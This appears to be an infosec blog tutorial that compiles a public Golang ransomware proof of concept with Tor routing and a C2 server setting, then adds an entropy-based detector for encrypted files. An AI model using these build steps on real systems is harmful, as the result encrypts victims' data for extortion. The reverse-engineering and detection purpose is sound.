
🎓BlackHats🏴‍☠️ -- 😈Let's build a Ransomware😏

CyberMorans🤗

Today you will taste the dark side😈


The Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom 😤 demonstrating the danger of ransomware to industrial systems and state infrastructure😟 The major US insurance company, CNA, admitted to having paid a ransom of $40 million!

And closer to home 😏, there were recent attacks ☠️ on the Kenya Aviation Authority (KAA) by the Medusa ransomware gang, and Jubilee Insurance is believed to have paid 🤑 Lockbit, the most prolific ransomware gang ☠, an unknown amount of ransom after appearing as a victim on their dark web data leak onion site in March 2023😟

To understand how ransomware works, we will build our own from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program; it is not designed for malicious purposes☺️ but rather to help us understand how ransomware works. Like the new variant, Snake ransomware 😰, and a growing number of malware strains, this ransomware is written in Golang 🧐

The ransomware encrypts files with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server 😰 This makes it very similar to Cryptolocker, one of the most successful ransomware attacks in history 😣

This ransomware POC will help you to better understand ransomware as a threat and to test whether your systems are vulnerable to such an attack.

☠️ ☠️ THIS IS FOR EDUCATIONAL PURPOSES ONLY -- AND REVERSE ENGINEERING ☠️ ☠️ -- Be cool 😜

Morans, let's do this 💪



🚀 Download and Install the Binaries

The first step is to fire up your Linux box and install golang 👇

kali > sudo apt install golang

Next, you will need to log in as the root user 👇

kali > sudo su -

Create a directory for the binaries. In this case, I named it simply "Azimio" 👇

kali > mkdir Azimio

Next, change into this directory 👇

kali > cd Azimio

Next, download the source code from github.com 👇

kali > git clone https://github.com/mauri870/ransomware

Next, we need to set some environment variables to direct the binaries and Go to the appropriate directories 👇


🚀 Make the Source Code Dependencies

With the variables set and exported, we need to build the dependencies. Navigate into the new ransomware directory and run make deps 👇

kali > cd ransomware
kali > make deps

🚀 Make the Source Code with Options

Now we build the source code. In this case, we will pass a few options☺️


👉 First, we want to use Tor so that communication with the server is routed and encrypted over the Tor network 👇

USE_TOR=true

👉 Second, we want to use our local IP at 10.0.0.5 (you can use any domain, even on a cloud service) 👇

SERVER_HOST=10.0.0.5

👉 Third, we want to use port 8080 (you can use any port) 👇

SERVER_PORT=8080

👉 Finally, we set the target operating system the code is compiled for, in this case Linux 👇

GOOS=linux

The full command looks something like this 👇

kali > make -e USE_TOR=true SERVER_HOST=10.0.0.5 SERVER_PORT=8080 GOOS=linux

Hit ENTER and let your ransomware compile -- Dance kidogo😆



🚀 Check the Directory for ransomware.exe

Once the build has finished, do a long listing of the ransomware directory 👇

kali > ls -l

Then navigate to the bin directory. Here you will see ransomware.exe, the server and unlocker.exe 👇

kali > cd bin

🚀 Examine the Types of Files to be Encrypted

To see which types of files this ransomware will encrypt, navigate to the cmd directory and open common.go 👇

kali > cd cmd
kali > more common.go

You can see the file extensions that the ransomware targets for encryption when executed😊 Now you can load up your test VMs, debuggers, and reverse engineering tools like Ghidra and IDA Pro to reverse engineer this ransomware. Give it a cool name as well... I named this one Kenyatta Ransomware 😄
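Two things above give a defender something to check for: AES-256-CTR output is statistically indistinguishable from random bytes, so an encrypted document has near-maximal entropy, and the extension list in common.go tells you which file types flip from "looks like a document" to "looks like noise" once the sample runs. The Go program below is an added example written for this post's detection angle; it is not part of mauri870's project. It walks a directory, computes each file's Shannon entropy and flags watched document types whose bytes look like ciphertext. The extension set, the 7.5 bits/byte threshold and the 64-byte minimum size are assumptions for illustration; when checking against this specific sample, copy the extensions out of cmd/common.go instead.

```go
package main

import (
	"fmt"
	"io/fs"
	"math"
	"os"
	"path/filepath"
	"sort"
	"strings"
)

// watchedExtensions is a constructed, illustrative set of document types of the
// kind ransomware targets. It is an assumption, not the list from cmd/common.go.
var watchedExtensions = map[string]bool{
	".txt": true, ".doc": true, ".docx": true, ".xls": true, ".xlsx": true,
	".pdf": true, ".jpg": true, ".sql": true, ".csv": true,
}

const (
	// Bits per byte above which a file is treated as ciphertext. AES-CTR output
	// sits at about 8.0; text documents usually sit between 4 and 6. Assumed value.
	EntropyThreshold = 7.5
	// Tiny files give a noisy entropy estimate, so they are skipped. Assumed value.
	MinSize = 64
)

// ShannonEntropy returns the entropy of data in bits per byte (0 to 8).
func ShannonEntropy(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	n := float64(len(data))
	h := 0.0
	for _, c := range counts {
		if c > 0 {
			p := float64(c) / n
			h -= p * math.Log2(p)
		}
	}
	return h
}

// hasWatchedExtension matches "report.docx" and also "report.docx.<marker>",
// because many families append their own extension after encrypting a file.
func hasWatchedExtension(name string) bool {
	base := strings.ToLower(filepath.Base(name))
	for i := 0; i < 2; i++ {
		ext := filepath.Ext(base)
		if ext == "" {
			return false
		}
		if watchedExtensions[ext] {
			return true
		}
		base = strings.TrimSuffix(base, ext)
	}
	return false
}

// Suspicious reports whether a file looks like an encrypted document: a watched
// extension whose contents are near-random.
func Suspicious(name string, data []byte) bool {
	if len(data) < MinSize || !hasWatchedExtension(name) {
		return false
	}
	return ShannonEntropy(data) > EntropyThreshold
}

// ScanDir walks root and returns the sorted paths of files that look encrypted.
func ScanDir(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() {
			return err
		}
		data, readErr := os.ReadFile(path)
		if readErr != nil {
			return nil // unreadable file: skip it rather than abort the scan
		}
		if Suspicious(path, data) {
			hits = append(hits, path)
		}
		return nil
	})
	sort.Strings(hits)
	return hits, err
}

func main() {
	hits, err := ScanDir(".")
	if err != nil {
		fmt.Fprintln(os.Stderr, "scan error:", err)
		os.Exit(1)
	}
	for _, p := range hits {
		fmt.Println("possible encrypted document:", p)
	}
}
```

Run it with go run inside a directory on the snapshotted test VM before and after detonating the sample: the before run should report nothing, and the after run lists exactly the documents the extension list covers. The same entropy-plus-extension heuristic is what file-integrity monitors and some EDR products use to raise an early alarm on mass encryption; its known blind spots are compressed or already-encrypted formats (archives, many media files), which are high-entropy even when untouched, so keep those out of the watched set.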

Remember to take a snapshot of your test VM before deploying the ransomware. DO NOT deploy this ransomware on your main machine!! 😁

🚀Conclusion 🤖

Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...😋


Follow me on twitter for daily Infosec memes and shenanigans😏


Morans,


Thank you for taking the time, and I hope you learned something new. Like and leave a comment/review and, as always, stay awesome! 😋👊 💪
